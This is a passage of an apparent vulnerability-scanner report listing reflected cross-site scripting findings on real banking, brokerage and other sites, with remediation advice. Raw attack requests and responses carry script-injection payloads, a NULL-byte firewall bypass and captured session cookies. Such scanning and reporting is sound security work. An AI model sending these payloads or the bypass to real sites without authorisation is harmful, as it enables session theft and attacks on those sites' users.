GET /index.php?option=com_content&task=view&id=7&Itemid=133f639"><script>alert(1)</script>217975010b0 HTTP/1.1 Host: www.learningsolutions.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.macaudailytimes.com.mo
Path:
/times-lab/21109-Tragedy-our-Commons.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdaa0'-alert(1)-'045651d38d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1 HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/self-directed-investing.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007604f"><script>alert(1)</script>840cc046a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7604f"><script>alert(1)</script>840cc046a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?%007604f"><script>alert(1)</script>840cc046a86=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0013948'%3bf91d272c668 was submitted in the src_cd parameter. This input was echoed as 13948';f91d272c668 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%0013948'%3bf91d272c668 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'BAC1.13948';f91d272c668' ,'Page' : 'self-directed-investing' ,'preview' : false }; //]]> ...[SNIP]...
3.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.merrilledge.com
Path: /m/pages/zero-dollar-trades.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093556"><script>alert(1)</script>754868bc16e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93556"><script>alert(1)</script>754868bc16e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?%0093556"><script>alert(1)</script>754868bc16e=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00ed4ab'%3b713afc694b6 was submitted in the src_cd parameter. This input was echoed as ed4ab';713afc694b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1%00ed4ab'%3b713afc694b6&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'SDMST1.ed4ab';713afc694b6' ,'Page' : 'zero-dollar-trades' ,'preview' : false }; //]]> ...[SNIP]...
3.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.merrilledge.com
Path: /m/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5a88"><script>alert(1)</script>68ae74c56a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a88"><script>alert(1)</script>68ae74c56a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/home.aspx?%00b5a88"><script>alert(1)</script>68ae74c56a4=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009bb58'-alert(1)-'f918fae9796 was submitted in the d parameter. This input was echoed as 9bb58'-alert(1)-'f918fae9796 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/ScriptResource.axd?d=aMsfwGC65viXscZammbwz6zVFIwHFO4g83huxlAC0KuLGg8lFje6MewypzmXEh1Q-UpPplE2gpclxViF2RgXdWh4YVn0Q7OU4DI9NURWJHVBNMFF62hTMIOAgq_f-eSgwyY66kBWIgZWwjCsZf_0Klh7YwLof_ssMm6kcCPx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076 HTTP/1.1 Host: www.retirement.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=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; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:33:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 5518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... /ira/scriptresource.axd?d=amsfwgc65vixsczammbwz6zvfiwhfo4g83huxlac0kulgg8lfje6mewypzmxeh1q-uppple2gpclxvif2rgxdwh4yvn0q7ou4di9nurwjhvbnmff62htmioagq_f-esgwyy66kbwigzwwjcszf_0klh7ywlof_ssmm6kccpx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076',"Exception has been thrown by the target of an invocation.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace") ...[SNIP]...
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003fef9'-alert(1)-'ad42e38776 was submitted in the d parameter. This input was echoed as 3fef9'-alert(1)-'ad42e38776 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916 HTTP/1.1 Host: www.retirement.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=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; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:33:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 3965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <script type='text/javascript' language='javascript'>g_ml_ira_jsLib_1_0.writeErrorMessage('dbe14061-d790-4130-9806-2537a9416f20','/ira/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script> ...[SNIP]...
3.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.retirement.merrilledge.com
Path: /IRA/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009627c"><script>alert(1)</script>ac0806a009c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9627c"><script>alert(1)</script>ac0806a009c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/pages/home.aspx?%009627c"><script>alert(1)</script>ac0806a009c=1 HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <a href="../System/SearchResults.aspx?.9627c"><script>alert(1)</script>ac0806a009c=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
3.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www2.bankofamerica.com
Path: /promos/jump/greatdeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb0e"%20a%3db%20b8409311022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bb0e" a=b b8409311022 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /promos/jump/greatdeals/?3bb0e"%20a%3db%20b8409311022=1 HTTP/1.1 Host: www2.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:30:31 GMT Content-type: text/html Set-Cookie: SMIDENTITY=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; path=/; domain=.bankofamerica.com; secure P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Abnormal Connection: close
<HTML> <HEAD> <TITLE>An Error Has Occurred</TITLE> </HEAD>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1ac"><a>d044400ccc3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=de1ac"><a>d044400ccc3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33074 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=KCDJILIAKJFFAMJGBLOJMJFD; secure; path=/ Date: Wed, 02 Feb 2011 22:00:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <input type="hidden" name="hdnSourceURL" value="HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=DE1AC"><A>D044400CCC3"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef54b'-alert(1)-'a8c45daa09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 01:04:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3685 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Def54b%27%2Dalert%281%29%2D%27a8c45daa09; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=GECPFOICPDDIKDIBPNDLBLKA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff9"><script>alert(1)</script>7f3eaf59b2d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /help/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Referer: http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:25 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=131550827; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49599--><script>alert(1)</script>3f6c8a7be9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pages/jpmorgan HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT Date: Wed, 02 Feb 2011 22:19:44 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=c9JYNJYQ7WXh3nVLQdNX56kVHZr1h13x6LR3BV6XVQ8pnhVHjnMl!-1967453422; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <t ...[SNIP]... <!-- userAgentPassed:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a --> ...[SNIP]...
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de9b"><script>alert(1)</script>6af6a5ce680 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8de9b\"><script>alert(1)</script>6af6a5ce680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en8de9b"><script>alert(1)</script>6af6a5ce680; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a91"><script>alert(1)</script>4a8a421a526 was submitted in the mbfcookie[lang] cookie. This input was echoed as 56a91\"><script>alert(1)</script>4a8a421a526 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cleanpipes HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en56a91"><script>alert(1)</script>4a8a421a526; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7177"><script>alert(1)</script>7651ebbe8e8 was submitted in the mbfcookie[lang] cookie. This input was echoed as a7177\"><script>alert(1)</script>7651ebbe8e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/865.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena7177"><script>alert(1)</script>7651ebbe8e8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaab4"><script>alert(1)</script>d4517558dd0 was submitted in the mbfcookie[lang] cookie. This input was echoed as eaab4\"><script>alert(1)</script>d4517558dd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=eneaab4"><script>alert(1)</script>d4517558dd0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
